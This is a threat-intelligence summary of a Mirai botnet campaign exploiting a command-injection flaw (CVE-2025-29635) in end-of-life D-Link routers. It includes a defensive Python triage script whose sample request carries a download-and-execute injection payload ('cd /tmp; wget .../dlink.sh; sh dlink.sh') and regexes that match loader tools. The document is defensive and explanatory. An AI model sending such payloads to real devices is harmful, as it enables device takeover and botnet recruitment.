Active Mirai botnet recruitment via CVE-2025-29635 in end-of-life D-Link routers
Summary
A Mirai-based malware campaign is actively exploiting CVE-2025-29635, a high-severity command-injection vulnerability in end-of-life D-Link DIR-823X routers, to recruit the devices into a botnet. The flaw allows unauthenticated remote code execution (RCE) through a crafted POST request to the /goform/set_prohibiting endpoint; the attackers use it to download and run a multi-architecture Mirai variant named "tuxnokill". Akamai SIRT detected the campaign in early March 2026, the first observed in-the-wild exploitation, 13 months after the vulnerability was publicly disclosed. The DIR-823X reached end-of-life in November 2024, so the affected firmware versions (240126 and 24082) will not receive a fix from D-Link; with no patch available, the only remediation is to retire or replace the device. The same threat actor also exploits CVE-2023-1389 in TP-Link routers and an RCE flaw in ZTE routers with the same attack pattern, deploying Mirai payloads across all targets.
Timeline
- 22.04.2026 23:04 · 1 article
  First in-the-wild exploitation of CVE-2025-29635 observed in Mirai botnet campaign
  Akamai SIRT detected active exploitation of CVE-2025-29635 in early March 2026, marking the first confirmed in-the-wild abuse of the D-Link DIR-823X command-injection flaw. Attackers are using the vulnerability to download and execute a Mirai-based malware variant, "tuxnokill," which supports multiple architectures and includes standard DDoS capabilities. The threat actor also exploits vulnerabilities in TP-Link and ZTE routers using the same pattern to deploy Mirai payloads.
  Sources:
  - New Mirai campaign exploits RCE flaw in EoL D-Link routers — www.bleepingcomputer.com — 22.04.2026 23:04
Information Snippets
- CVE-2025-29635 is a high-severity command-injection flaw in D-Link DIR-823X routers (firmware versions 240126 and 24082) enabling unauthenticated remote code execution via a POST request to /goform/set_prohibiting.
  First reported: 22.04.2026 23:04 (1 source, 1 article)
  Source: New Mirai campaign exploits RCE flaw in EoL D-Link routers — www.bleepingcomputer.com — 22.04.2026 23:04
- The Mirai-based malware variant "tuxnokill" supports multiple architectures and includes standard DDoS capabilities such as TCP SYN/ACK/STOMP, UDP floods, and HTTP null attacks.
  First reported: 22.04.2026 23:04 (1 source, 1 article)
  Source: New Mirai campaign exploits RCE flaw in EoL D-Link routers — www.bleepingcomputer.com — 22.04.2026 23:04
- The campaign was first detected by Akamai SIRT in early March 2026, representing the first confirmed in-the-wild exploitation of CVE-2025-29635 despite public disclosure 13 months prior.
  First reported: 22.04.2026 23:04 (1 source, 1 article)
  Source: New Mirai campaign exploits RCE flaw in EoL D-Link routers — www.bleepingcomputer.com — 22.04.2026 23:04
- Attackers use the injected command to change into a writable directory on the device, download a shell script (dlink.sh) from an external IP address, and execute it to install the Mirai payload.
  First reported: 22.04.2026 23:04 (1 source, 1 article)
  Source: New Mirai campaign exploits RCE flaw in EoL D-Link routers — www.bleepingcomputer.com — 22.04.2026 23:04
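The exploitation chain described above (a POST to /goform/set_prohibiting whose injected command changes into a writable directory, fetches dlink.sh from an external host and runs it) gives a detection engineer something concrete to match on. The Python triage check below is an added example, not code from this page, from Akamai SIRT or from BleepingComputer. The HTTP requests, the form parameter name `param` and the IP addresses (TEST-NET ranges) are constructed; the page does not name the injected parameter, so the check scans the whole decoded request body rather than a single field. A plain POST to the endpoint with no injection markers is still flagged as suspicious, because on an EoL device with an unauthenticated RCE this endpoint should not be reachable from the internet at all.

```python
"""Triage raw HTTP requests for CVE-2025-29635 exploitation attempts.

Added example (hypothetical parameter name, constructed sample requests).
The page reports only the endpoint, the cd-to-writable-path step, the
dlink.sh download and its execution; nothing else about the real payload
is assumed here.
"""
import re
from urllib.parse import unquote_plus, urlsplit

TARGET_PATH = "/goform/set_prohibiting"

# Command separators that turn a form value into an additional shell command.
SHELL_META = re.compile(r"[;|&`]|\$\(")
# Download-and-execute tokens typical of Mirai-style loader one-liners.
LOADER_TOKENS = re.compile(r"\b(wget|curl|tftp|ftpget|busybox|chmod|sh)\b", re.I)
# Directories a loader changes into because they are writable on embedded Linux.
WRITABLE_PATHS = ("/tmp", "/var/tmp", "/dev/shm", "/var/run", "/mnt")


def parse_request(raw: str):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, urlsplit(target).path, headers, body


def triage(raw: str) -> dict:
    """Classify one request.

    verdict: 'ignore' for other endpoints, 'suspicious' for a request to the
    vulnerable endpoint with no injection markers, 'exploit-attempt' when the
    body carries command-injection or loader indicators.
    """
    method, path, _headers, body = parse_request(raw)
    if path != TARGET_PATH:
        return {"verdict": "ignore", "indicators": [], "method": method}
    decoded = unquote_plus(body)  # bodies are form-encoded; decode before matching
    indicators = []
    if SHELL_META.search(decoded):
        indicators.append("shell-metacharacter")
    if LOADER_TOKENS.search(decoded):
        indicators.append("download-and-execute")
    if any(p in decoded for p in WRITABLE_PATHS):
        indicators.append("writable-path")
    if "dlink.sh" in decoded:
        indicators.append("dlink.sh")  # script name reported for this campaign
    verdict = "exploit-attempt" if indicators else "suspicious"
    return {"verdict": verdict, "indicators": indicators, "method": method}


def scan(requests):
    """Triage a batch of raw requests; returns one result dict per request."""
    return [triage(r) for r in requests]


# Constructed sample requests (not real captures). 'param' is a placeholder
# for whichever form field the real exploit abuses.
EXPLOIT = (
    "POST /goform/set_prohibiting HTTP/1.1\r\n"
    "Host: 192.0.2.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "param=1%3Bcd+%2Ftmp%3B+wget+http%3A%2F%2F203.0.113.5%2Fdlink.sh%3B+sh+dlink.sh"
)
BENIGN = (
    "POST /goform/set_prohibiting HTTP/1.1\r\n"
    "Host: 192.168.0.1\r\n"
    "\r\n"
    "param=1"
)
OTHER = "GET /index.html HTTP/1.1\r\nHost: 192.168.0.1\r\n\r\n"

if __name__ == "__main__":
    for result in scan([EXPLOIT, BENIGN, OTHER]):
        print(result)
```

The decoded exploit body reads `param=1;cd /tmp; wget http://203.0.113.5/dlink.sh; sh dlink.sh`, which trips all four indicators. In production the same logic belongs in a WAF or IDS rule on the edge; the point of the `suspicious` tier is that exposure of this endpoint to the WAN is itself the finding, whatever the payload.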
- The threat actor also exploits CVE-2023-1389 in TP-Link routers and an RCE flaw in ZTE ZXV10 H108L routers, using consistent attack patterns to deploy Mirai payloads.
  First reported: 22.04.2026 23:04 (1 source, 1 article)
  Source: New Mirai campaign exploits RCE flaw in EoL D-Link routers — www.bleepingcomputer.com — 22.04.2026 23:04
- D-Link DIR-823X routers reached end-of-life (EoL) in November 2024, and no patches are expected for CVE-2025-29635 from the vendor.
  First reported: 22.04.2026 23:04 (1 source, 1 article)
  Source: New Mirai campaign exploits RCE flaw in EoL D-Link routers — www.bleepingcomputer.com — 22.04.2026 23:04